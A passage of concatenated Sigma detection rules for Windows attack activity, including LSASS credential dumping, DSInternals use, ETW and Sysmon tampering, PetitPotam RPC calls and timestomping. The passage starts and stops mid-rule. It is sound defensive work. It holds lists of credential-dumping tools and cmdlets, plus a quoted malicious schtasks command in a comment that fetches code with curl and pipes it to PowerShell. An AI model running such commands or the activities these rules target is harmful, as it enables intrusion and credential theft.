- https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680
- https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699
- https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8
- https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1
author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
date: 2024-01-11
tags:
- attack.reconnaissance
- attack.t1595
logsource:
category: process_creation
product: windows
detection:
selection_parent_ext:
ParentCommandLine|contains:
- '.bat'
- '.chm'
- '.cmd'
- '.hta'
- '.htm'
- '.html'
- '.js'
- '.lnk'
- '.ps1'
- '.vbe'
- '.vbs'
- '.wsf'
selection_parent_path_1:
ParentCommandLine|contains:
- ':\Perflogs\'
- ':\Temp\'
- ':\Users\Public\'
- ':\Windows\Temp\'
- '\AppData\Local\Temp'
- '\AppData\Roaming\'
- '\Temporary Internet'
selection_parent_path_2:
- ParentCommandLine|contains|all:
- ':\Users\'
- '\Favorites\'
- ParentCommandLine|contains|all:
- ':\Users\'
- '\Favourites\'
- ParentCommandLine|contains|all:
- ':\Users\'
- '\Contacts\'
selection_cli:
- Image|endswith: '\PingCastle.exe'
- OriginalFileName: PingCastle.exe
- Product: 'Ping Castle'
- CommandLine|contains:
- '--scanner aclcheck'
- '--scanner antivirus'
- '--scanner computerversion'
- '--scanner foreignusers'
- '--scanner laps_bitlocker'
- '--scanner localadmin'
- '--scanner nullsession'
- '--scanner nullsession-trust'
- '--scanner oxidbindings'
- '--scanner remote'
- '--scanner share'
- '--scanner smb'
- '--scanner smb3querynetwork'
- '--scanner spooler'
- '--scanner startup'
- '--scanner zerologon'
- CommandLine|contains: '--no-enum-limit'
- CommandLine|contains|all:
- '--healthcheck'
- '--level Full'
- CommandLine|contains|all:
- '--healthcheck'
- '--server '
condition: 1 of selection_parent_* and selection_parent_ext and selection_cli
falsepositives:
- Unknown
level: high
title: DSInternals Suspicious PowerShell Cmdlets
id: 43d91656-a9b2-4541-b7e2-6a9bd3a13f4e
related:
- id: 846c7a87-8e14-4569-9d49-ecfd4276a01c
type: similar
status: test
description: |
Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
references:
- https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1
author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri
date: 2024-06-26
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains:
- 'Add-ADDBSidHistory'
- 'Add-ADNgcKey'
- 'Add-ADReplNgcKey'
- 'ConvertFrom-ADManagedPasswordBlob'
- 'ConvertFrom-GPPrefPassword'
- 'ConvertFrom-ManagedPasswordBlob'
- 'ConvertFrom-UnattendXmlPassword'
- 'ConvertFrom-UnicodePassword'
- 'ConvertTo-AADHash'
- 'ConvertTo-GPPrefPassword'
- 'ConvertTo-KerberosKey'
- 'ConvertTo-LMHash'
- 'ConvertTo-MsoPasswordHash'
- 'ConvertTo-NTHash'
- 'ConvertTo-OrgIdHash'
- 'ConvertTo-UnicodePassword'
- 'Disable-ADDBAccount'
- 'Enable-ADDBAccount'
- 'Get-ADDBAccount'
- 'Get-ADDBBackupKey'
- 'Get-ADDBDomainController'
- 'Get-ADDBGroupManagedServiceAccount'
- 'Get-ADDBKdsRootKey'
- 'Get-ADDBSchemaAttribute'
- 'Get-ADDBServiceAccount'
- 'Get-ADDefaultPasswordPolicy'
- 'Get-ADKeyCredential' # Covers 'Get-ADKeyCredentialLink'
- 'Get-ADPasswordPolicy'
- 'Get-ADReplAccount'
- 'Get-ADReplBackupKey'
- 'Get-ADReplicationAccount'
- 'Get-ADSIAccount'
- 'Get-AzureADUserEx'
- 'Get-BootKey'
- 'Get-KeyCredential'
- 'Get-LsaBackupKey'
- 'Get-LsaPolicy' # Covers 'Get-LsaPolicyInformation'
- 'Get-SamPasswordPolicy'
- 'Get-SysKey'
- 'Get-SystemKey'
- 'New-ADDBRestoreFromMediaScript'
- 'New-ADKeyCredential' # Covers 'New-ADKeyCredentialLink'
- 'New-ADNgcKey'
- 'New-NTHashSet'
- 'Remove-ADDBObject'
- 'Save-DPAPIBlob'
- 'Set-ADAccountPasswordHash'
- 'Set-ADDBAccountPassword' # Covers 'Set-ADDBAccountPasswordHash'
- 'Set-ADDBBootKey'
- 'Set-ADDBDomainController'
- 'Set-ADDBPrimaryGroup'
- 'Set-ADDBSysKey'
- 'Set-AzureADUserEx'
- 'Set-LsaPolicy' # Covers 'Set-LSAPolicyInformation'
- 'Set-SamAccountPasswordHash'
- 'Set-WinUserPasswordHash'
- 'Test-ADDBPasswordQuality'
- 'Test-ADPasswordQuality'
- 'Test-ADReplPasswordQuality'
- 'Test-PasswordQuality'
- 'Unlock-ADDBAccount'
- 'Write-ADNgcKey'
- 'Write-ADReplNgcKey'
condition: selection
falsepositives:
- Legitimate usage of DSInternals for administration or audit purpose.
level: high
title: Suspicious Process Access to LSASS with Dbgcore/Dbghelp DLLs
id: 9f5c1d59-33be-4e60-bcab-85d2f566effd
related:
- id: 416bc4a2-7217-4519-8dc7-c3271817f1d5
type: similar
status: experimental
description: |
Detects suspicious process access to LSASS.exe from processes located in uncommon locations with dbgcore.dll or dbghelp.dll in the call trace.
These DLLs contain functions like MiniDumpWriteDump that can be abused for credential dumping purposes. While modern tools like Mimikatz have moved to using ntdll.dll,
dbgcore.dll and dbghelp.dll are still used by basic credential dumping utilities and legacy tools for LSASS memory access and process suspension techniques.
references:
- https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html
- https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpwritedump
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-27
tags:
- attack.credential-access
- attack.defense-impairment
- attack.t1003.001
- attack.t1685
logsource:
category: process_access
product: windows
detection:
selection_lsass_calltrace:
TargetImage|endswith: '\lsass.exe'
CallTrace|contains:
- 'dbgcore.dll'
- 'dbghelp.dll'
# The following selection is commented out and not enabled by default because any access to LSASS with dbgcore.dll or dbghelp.dll in the call trace from uncommon locations is assumed to be suspicious,
# but it may reduce false positives if the rule is too noisy. These GrantedAccess bits are commonly used for dumping LSASS memory.
# Uncomment if you observe false positives with the default rule.
# selection_granted_access:
# GrantedAccess|contains:
# - '0x1fffff'
# - '0x10'
# - '0x1010'
# - '0x1410'
# - '0x1438'
selection_susp_location:
SourceImage|contains:
- ':\Perflogs\'
- ':\Temp\'
- ':\Users\Public\'
- '\$Recycle.Bin\'
- '\AppData\Roaming\'
- '\Contacts\'
- '\Desktop\'
- '\Documents\'
- '\Downloads\'
- '\Favorites\'
- '\Favourites\'
- '\inetpub\wwwroot\'
- '\Music\'
- '\Pictures\'
- '\Start Menu\Programs\Startup\'
- '\Users\Default\'
- '\Videos\'
- '\Windows\Temp\'
condition: all of selection_*
falsepositives:
- Possibly during software installation or update processes
level: high
regression_tests_path: regression_data/rules/windows/process_access/proc_access_win_susp_dbgcore_dbghelp_load/info.yml
title: Remote LSASS Process Access Through Windows Remote Management
id: aa35a627-33fb-4d04-a165-d33b4afca3e8
status: stable
description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
references:
- https://pentestlab.blog/2018/05/15/lateral-movement-winrm/
author: Patryk Prauze - ING Tech
date: 2019-05-20
modified: 2023-11-29
tags:
- attack.credential-access
- attack.execution
- attack.t1003.001
- attack.t1059.001
- attack.lateral-movement
- attack.t1021.006
- attack.s0002
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
SourceImage|endswith: ':\Windows\system32\wsmprovhost.exe'
filter_main_access:
GrantedAccess: '0x80000000'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unlikely
level: high
title: Credential Dumping Attempt Via Svchost
id: 174afcfa-6e40-4ae9-af64-496546389294
status: test
description: Detects when a process tries to access the memory of svchost to potentially dump credentials.
references:
- Internal Research
author: Florent Labouyrie
date: 2021-04-30
modified: 2022-10-09
tags:
- attack.privilege-escalation
- attack.t1548
logsource:
product: windows
category: process_access
detection:
selection:
TargetImage|endswith: '\svchost.exe'
GrantedAccess: '0x143a'
filter_main_known_processes:
SourceImage|endswith:
- '\services.exe'
- '\msiexec.exe'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
title: Credential Dumping Activity By Python Based Tool
id: f8be3e82-46a3-4e4e-ada5-8e538ae8b9c9
related:
- id: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0
type: obsolete
- id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b
type: obsolete
status: stable
description: Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.
references:
- https://twitter.com/bh4b3sh/status/1303674603819081728
- https://github.com/skelsec/pypykatz
author: Bhabesh Raj, Jonhnathan Ribeiro
date: 2023-11-27
modified: 2023-11-29
tags:
- attack.credential-access
- attack.t1003.001
- attack.s0349
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
CallTrace|contains|all:
- '_ctypes.pyd+'
- ':\Windows\System32\KERNELBASE.dll+'
- ':\Windows\SYSTEM32\ntdll.dll+'
CallTrace|contains:
- 'python27.dll+'
- 'python3*.dll+'
GrantedAccess: '0x1FFFFF'
condition: selection
falsepositives:
- Unknown
level: high
title: Credential Dumping Attempt Via WerFault
id: e5b33f7d-eb93-48b6-9851-09e1e610b6d7
status: test
description: Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.
references:
- https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507
author: Florian Roth (Nextron Systems)
date: 2012-06-27
modified: 2023-11-29
tags:
- attack.credential-access
- attack.t1003.001
- attack.s0002
logsource:
category: process_access
product: windows
detection:
selection:
SourceImage|endswith: '\WerFault.exe'
TargetImage|endswith: '\lsass.exe'
GrantedAccess: '0x1FFFFF'
condition: selection
falsepositives:
- Actual failures in lsass.exe that trigger a crash dump (unlikely)
- Unknown cases in which WerFault accesses lsass.exe
level: high
title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location
id: 416bc4a2-7217-4519-8dc7-c3271817f1d5
related:
- id: 9f5c1d59-33be-4e60-bcab-85d2f566effd
type: similar
status: experimental
description: |
Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories.
These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes or in some cases for evading EDR/AV detection by suspending processes.
references:
- https://blog.axelarator.net/hunting-for-edr-freeze/
- https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html
- https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-27
modified: 2026-01-09
tags:
- attack.credential-access
- attack.defense-impairment
- attack.t1003
- attack.t1685
logsource:
category: image_load
product: windows
detection:
selection_img:
Image|contains:
- ':\Perflogs\'
- ':\Temp\'
- ':\Users\Public\'
- '\$Recycle.Bin\'
- '\Contacts\'
# - '\Desktop\'
- '\Documents\'
# - '\Downloads\'
- '\Favorites\'
- '\Favourites\'
- '\inetpub\wwwroot\'
- '\Music\'
- '\Pictures\'
- '\Start Menu\Programs\Startup\'
- '\Users\Default\'
- '\Videos\'
# - '\AppData\Local\Temp\' some installers may load from here
selection_dll:
ImageLoaded|endswith:
- '\dbgcore.dll'
- '\dbghelp.dll'
condition: all of selection_*
falsepositives:
- Unknown
level: high
regression_tests_path: regression_data/rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load/info.yml
title: UAC Bypass With Fake DLL
id: a5ea83a7-05a5-44c1-be2e-addccbbd8c03
status: test
description: Attempts to load dismcore.dll after dropping it
references:
- https://steemit.com/utopian-io/@ah101/uac-bypassing-utility
author: oscd.community, Dmitry Uchakin
date: 2020-10-06
modified: 2022-12-25
tags:
- attack.persistence
- attack.privilege-escalation
- attack.execution
- attack.stealth
- attack.t1548.002
- attack.t1574.001
logsource:
category: image_load
product: windows
detection:
selection:
Image|endswith: '\dism.exe'
ImageLoaded|endswith: '\dismcore.dll'
filter:
ImageLoaded: 'C:\Windows\System32\Dism\dismcore.dll'
condition: selection and not filter
falsepositives:
- Actions of a legitimate telnet client
level: high
title: ETW Logging Disabled In .NET Processes - Registry
id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc
related:
- id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544
type: similar
status: test
description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
references:
- https://twitter.com/_xpn_/status/1268712093928378368
- https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
- https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
- https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
- https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
- https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
- https://bunnyinside.com/?term=f71e8cb9c76a
- http://managed670.rssing.com/chan-5590147/all_p1.html
- https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
- https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-06-05
modified: 2022-12-20
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- attack.t1685
logsource:
product: windows
service: security
detection:
selection_etw_enabled:
EventID: 4657
ObjectName|endswith: '\SOFTWARE\Microsoft\.NETFramework'
ObjectValueName: 'ETWEnabled'
NewValue: 0
selection_complus:
EventID: 4657
ObjectName|contains: '\Environment'
ObjectValueName:
- 'COMPlus_ETWEnabled'
- 'COMPlus_ETWFlags'
NewValue: 0
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
title: Credential Dumping Tools Service Execution - Security
id: f0d1feba-4344-4ca9-8121-a6c97bd6df52
related:
- id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed
type: derived
status: test
description: Detects well-known credential dumping tools execution via service execution events
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
date: 2017-03-05
modified: 2022-11-29
tags:
- attack.credential-access
- attack.execution
- attack.t1003.001
- attack.t1003.002
- attack.t1003.004
- attack.t1003.005
- attack.t1003.006
- attack.t1569.002
- attack.s0005
logsource:
product: windows
service: security
definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
detection:
selection:
EventID: 4697
ServiceFileName|contains:
- 'cachedump'
- 'dumpsvc'
- 'fgexec'
- 'gsecdump'
- 'mimidrv'
- 'pwdump'
- 'servpw'
condition: selection
falsepositives:
- Legitimate Administrator using credential dumping tool for password recovery
level: high
title: Possible Impacket SecretDump Remote Activity
id: 252902e3-5830-4cf6-bf21-c22083dfd5cf
status: test
description: Detect AD credential dumping using impacket secretdump HKTL
references:
- https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
author: Samir Bousseaden, wagga
date: 2019-04-03
modified: 2022-08-11
tags:
- attack.credential-access
- attack.t1003.002
- attack.t1003.004
- attack.t1003.003
logsource:
product: windows
service: security
definition: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
detection:
selection:
EventID: 5145
ShareName: '\\\\\*\\ADMIN$' # looking for the string \\*\ADMIN$
RelativeTargetName|contains|all:
- 'SYSTEM32\'
- '.tmp'
condition: selection
falsepositives:
- Unknown
level: high
title: Credential Dumping Tools Service Execution - System
id: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed
status: test
description: Detects well-known credential dumping tools execution via service execution events
references:
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
date: 2017-03-05
modified: 2022-11-29
tags:
- attack.credential-access
- attack.execution
- attack.t1003.001
- attack.t1003.002
- attack.t1003.004
- attack.t1003.005
- attack.t1003.006
- attack.t1569.002
- attack.s0005
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Service Control Manager'
EventID: 7045
ImagePath|contains:
- 'cachedump'
- 'dumpsvc'
- 'fgexec'
- 'gsecdump'
- 'mimidrv'
- 'pwdump'
- 'servpw'
condition: selection
falsepositives:
- Legitimate Administrator using credential dumping tool for password recovery
level: high
title: Critical Hive In Suspicious Location Access Bits Cleared
id: 39f919f3-980b-4e6f-a975-8af7e507ef2b
related:
- id: 839dd1e8-eda8-4834-8145-01beeee33acd
type: obsolete
status: test
description: |
Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset.
This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default).
Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.
references:
- https://github.com/nasbench/Misc-Research/blob/b20da2336de0f342d31ef4794959d28c8d3ba5ba/ETW/Microsoft-Windows-Kernel-General.md
author: Florian Roth (Nextron Systems)
date: 2017-05-15
modified: 2024-01-18
tags:
- attack.credential-access
- attack.t1003.002
logsource:
product: windows
service: system
detection:
selection:
EventID: 16
Provider_Name: Microsoft-Windows-Kernel-General
HiveName|contains:
- '\Temp\SAM'
- '\Temp\SECURITY'
condition: selection
falsepositives:
- Unknown
level: high
title: Sysmon Configuration Modification
id: 1f2b5353-573f-4880-8e33-7d04dcf97744
status: test
description: Detects when an attacker tries to hide from Sysmon by disabling or stopping it
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
- https://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html
author: frack113
date: 2021-06-04
modified: 2022-08-02
tags:
- attack.stealth
- attack.t1564
logsource:
product: windows
category: sysmon_status
detection:
selection_stop:
State: Stopped
selection_conf:
- 'Sysmon config state changed'
filter:
State: Started
condition: 1 of selection_* and not filter
falsepositives:
- Legitimate administrative action
level: high
title: ETW Logging Disabled In .NET Processes - Sysmon Registry
id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544
related:
- id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc
type: similar
status: test
description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
references:
- https://twitter.com/_xpn_/status/1268712093928378368
- https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
- https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
- https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
- https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
- https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
- https://bunnyinside.com/?term=f71e8cb9c76a
- http://managed670.rssing.com/chan-5590147/all_p1.html
- https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
- https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/
- https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-06-05
modified: 2023-08-17
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- attack.t1685
logsource:
product: windows
category: registry_set
detection:
selection_etw_enabled:
TargetObject|endswith: 'SOFTWARE\Microsoft\.NETFramework\ETWEnabled'
Details: 'DWORD (0x00000000)'
selection_complus:
TargetObject|endswith:
- '\COMPlus_ETWEnabled'
- '\COMPlus_ETWFlags'
Details:
- 0 # For REG_SZ type
- 'DWORD (0x00000000)'
condition: 1 of selection_*
falsepositives:
- Unknown
level: high
title: Suspicious SQL Query
id: d84c0ded-edd7-4123-80ed-348bb3ccc4d5
status: test
description: Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields
author: '@juju4'
date: 2022-12-27
references:
- https://github.com/sqlmapproject/sqlmap
tags:
- attack.exfiltration
- attack.initial-access
- attack.privilege-escalation
- attack.persistence
- attack.t1190
- attack.t1505.001
logsource:
category: database
definition: 'Requirements: Must be able to log the SQL queries'
detection:
keywords:
- 'drop'
- 'truncate'
- 'dump'
- 'select \*'
condition: keywords
falsepositives:
- Inventory and monitoring activity
- Vulnerability scanners
- Legitimate applications
level: medium
title: MITRE BZAR Indicators for Execution
id: b640c0b8-87f8-4daa-aef8-95a24261dd1d
status: test
description: 'Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE'
references:
- https://github.com/mitre-attack/bzar#indicators-for-attck-execution
author: '@neu5ron, SOC Prime'
date: 2020-03-19
modified: 2021-11-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1047
- attack.t1053.002
- attack.t1569.002
logsource:
product: zeek
service: dce_rpc
detection:
op1:
endpoint: 'JobAdd'
operation: 'atsvc'
op2:
endpoint: 'ITaskSchedulerService'
operation: 'SchRpcEnableTask'
op3:
endpoint: 'ITaskSchedulerService'
operation: 'SchRpcRegisterTask'
op4:
endpoint: 'ITaskSchedulerService'
operation: 'SchRpcRun'
op5:
endpoint: 'IWbemServices'
operation: 'ExecMethod'
op6:
endpoint: 'IWbemServices'
operation: 'ExecMethodAsync'
op7:
endpoint: 'svcctl'
operation: 'CreateServiceA'
op8:
endpoint: 'svcctl'
operation: 'CreateServiceW'
op9:
endpoint: 'svcctl'
operation: 'StartServiceA'
op10:
endpoint: 'svcctl'
operation: 'StartServiceW'
condition: 1 of op*
falsepositives:
- Windows administrator tasks or troubleshooting
- Windows management scripts or software
level: medium
title: Potential PetitPotam Attack Via EFS RPC Calls
id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a
status: test
description: |
Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.
The usage of this RPC function should be rare if ever used at all.
Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.
View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'
references:
- https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp
- https://msrc.microsoft.com/update-guide/vulnerability/ADV210003
- https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf
- https://threatpost.com/microsoft-petitpotam-poc/168163/
author: '@neu5ron, @Antonlovesdnb, Mike Remen'
date: 2021-08-17
modified: 2022-11-28
tags:
- attack.collection
- attack.credential-access
- attack.t1557.001
- attack.t1187
logsource:
product: zeek
service: dce_rpc
detection:
selection:
operation|startswith: 'efs'
condition: selection
falsepositives:
- Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).
level: medium
title: MITRE BZAR Indicators for Persistence
id: 53389db6-ba46-48e3-a94c-e0f2cefe1583
status: test
description: 'Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.'
references:
- https://github.com/mitre-attack/bzar#indicators-for-attck-persistence
author: '@neu5ron, SOC Prime'
date: 2020-03-19
modified: 2021-11-27
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.004
logsource:
product: zeek
service: dce_rpc
detection:
op1:
endpoint: 'spoolss'
operation: 'RpcAddMonitor'
op2:
endpoint: 'spoolss'
operation: 'RpcAddPrintProcessor'
op3:
endpoint: 'IRemoteWinspool'
operation: 'RpcAsyncAddMonitor'
op4:
endpoint: 'IRemoteWinspool'
operation: 'RpcAsyncAddPrintProcessor'
op5:
endpoint: 'ISecLogon'
operation: 'SeclCreateProcessWithLogonW'
op6:
endpoint: 'ISecLogon'
operation: 'SeclCreateProcessWithLogonExW'
condition: 1 of op*
falsepositives:
- Windows administrator tasks or troubleshooting
- Windows management scripts or software
level: medium
title: Powershell Timestomp
id: c6438007-e081-42ce-9483-b067fbef33c3
status: test
description: |
Adversaries may modify file time attributes to hide new or changes to existing files.
Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md
- https://www.offensive-security.com/metasploit-unleashed/timestomp/
author: frack113
date: 2021-08-03
modified: 2022-12-25
tags:
- attack.stealth
- attack.t1070.006
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_ioc:
ScriptBlockText|contains:
- '.CreationTime ='
- '.LastWriteTime ='
- '.LastAccessTime ='
- '[IO.File]::SetCreationTime'
- '[IO.File]::SetLastAccessTime'
- '[IO.File]::SetLastWriteTime'
condition: selection_ioc
falsepositives:
- Legitimate admin script
level: medium
title: Process Memory Dump Via Dotnet-Dump
id: 53d8d3e1-ca33-4012-adf3-e05a4d652e34
status: test
description: |
Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
references:
- https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect
- https://twitter.com/bohops/status/1635288066909966338
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-14
tags:
- attack.stealth
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\dotnet-dump.exe'
- OriginalFileName: 'dotnet-dump.dll'
selection_cli:
CommandLine|contains: 'collect'
condition: all of selection_*
falsepositives:
- Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated
level: medium
title: Scheduled Task Creation with Curl and PowerShell Execution Combo
id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
status: experimental
description: |
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
references:
- https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.stealth
- attack.t1053.005
- attack.t1218
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
# Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
selection_img:
Image|endswith: '\schtasks.exe'
CommandLine|contains|windash: ' /create '
selection_curl:
CommandLine|contains|all:
- 'curl '
- 'http'
- '-o'
selection_powershell:
CommandLine|contains: 'powershell'
condition: all of selection_*
falsepositives:
- Legitimate use of schtasks for administrative purposes.
- Automation scripts combining curl and PowerShell in controlled environments.
level: medium
title: Potential Memory Dumping Activity Via LiveKD
id: a85f7765-698a-4088-afa0-ecfbf8d01fa4
status: test
description: Detects execution of LiveKD based on PE metadata or image name
references:
- https://learn.microsoft.com/en-us/sysinternals/downloads/livekd
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-15
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith:
- '\livekd.exe'
- '\livekd64.exe'
- OriginalFileName: 'livekd.exe'
condition: selection
falsepositives:
- Administration and debugging activity (must be investigated)
level: medium
title: Potentially Suspicious Ping/Copy Command Combination
id: ded2b07a-d12f-4284-9b76-653e37b6c8b0
status: test
description: |
Detects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
references:
- Internal Research
